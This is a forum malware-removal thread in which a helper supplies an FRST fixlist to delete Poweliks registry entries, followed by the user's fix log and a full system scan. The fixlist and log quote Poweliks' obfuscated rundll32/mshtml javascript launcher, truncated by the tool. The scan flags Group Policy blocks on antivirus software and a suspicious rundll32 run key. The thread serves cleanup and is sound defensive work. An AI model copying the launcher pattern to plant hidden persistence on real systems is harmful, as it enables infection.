Completion time: 2014-08-25  11:10:46
ComboFix-quarantined-files.txt  2014-08-25 15:10
ComboFix2.txt  2014-08-24 19:45
ComboFix3.txt  2014-08-23 20:16
ComboFix4.txt  2014-08-23 18:22
.
Pre-Run: 238,789,816,320 bytes free
Post-Run: 238,726,463,488 bytes free
.
- - End Of File - - D0071B68A17A82DBD63337816FF7894D
5C616939100B85E558DA92B899A0FC36
Link to post
Share on other sites

Still no joy  :angry2:
I wonder if it's not a new modification.


Anyway we need to kill Poweliks prior to other baddies, so I'm gonna focus on it now.


FRST.gif Fix with Farbar Recovery Scan Tool
 

icon_exclaim.gif This fix was created for this user for use on that particular machine. icon_exclaim.gif
icon_exclaim.gif Running it on another one may cause damage and render the system unstable. icon_exclaim.gif


Press the WindowsKey.png + R on your keyboard at the same time. Type Notepad and click OK.

  • Copy the entire content of the codebox below and paste into the Notepad document:
    startHKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?end
  • Click File, Save As and type fixlist.txt as the File Name.

Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    > XP users click run after receipt of Windows Security Warning - Open File.
    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please include it in your reply.



FRST.gif Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool.

  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    > XP users click run after receipt of Windows Security Warning - Open File.
    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please include their content in your next reply.

Link to post
Share on other sites

Fixlog

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version:23-08-2014
Ran by savas.kyriakidis at 2014-08-25 13:39:24 Run:1
Running from F:\
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
start
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
end
*****************
 
"HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
 
==== End of Fixlog ====
 
FRST
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014
Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 25-08-2014 13:41:21
Running from F:\
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE
( ) C:\Windows\System32\lxblcoms.exe
() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe
() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe
(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)
HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()
HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )
HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)
HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)
HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [997920 2011-06-15] (Microsoft Corporation)
HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)
HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM\...\Policies\Explorer: [useDefaultTile] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [uINoteworthy] => C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer <===== ATTENTION
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnk
ShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
ShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnk
ShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
BootExecute: autocheck autochk *  BootDefrag.exesasnative32
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cab
DPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)
Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]
FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]
FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4
FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
 
Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx []
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)
S3 AVG Security Toolbar Service; C:\Program Files\AVG\AVG10\Toolbar\ToolbarBroker.exe [167264 2011-11-10] ()
R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)
S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)
R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)
R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) [File not signed]
S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)
R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]
S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)
R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]
R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]
S2 vToolbarUpdater; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\9.0.1\ToolbarUpdater.exe [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)
R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)
S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)
R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)
S3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)
R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)
S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) [File not signed]
U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)
S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]
S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]
R3 catchme; \??\C:\Users\SAVAS~1.KYR\AppData\Local\Temp\catchme.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]
S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]
S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X]
U3 mbr; \??\C:\ComboFix\mbr.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-25 11:10 - 2014-08-25 11:10 - 00043997 _____ () C:\ComboFix.txt
2014-08-25 10:53 - 2014-08-25 11:10 - 00000000 ____D () C:\ComboFix
2014-08-23 16:54 - 2014-08-25 13:41 - 00000000 ____D () C:\FRST
2014-08-23 16:30 - 2014-08-25 09:35 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-23 16:30 - 2014-08-25 08:26 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:51 - 2014-08-23 11:53 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys
2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys
2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:12 - 2014-08-25 10:47 - 00040016 _____ () C:\Windows\PFRO.log
2014-08-22 15:52 - 2014-08-25 11:10 - 00000000 ____D () C:\Qoobox
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:00 - 2014-08-23 16:48 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-22 13:41 - 2014-08-22 13:54 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:25 - 2014-08-25 13:39 - 00001564 _____ () C:\Windows\setupact.log
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
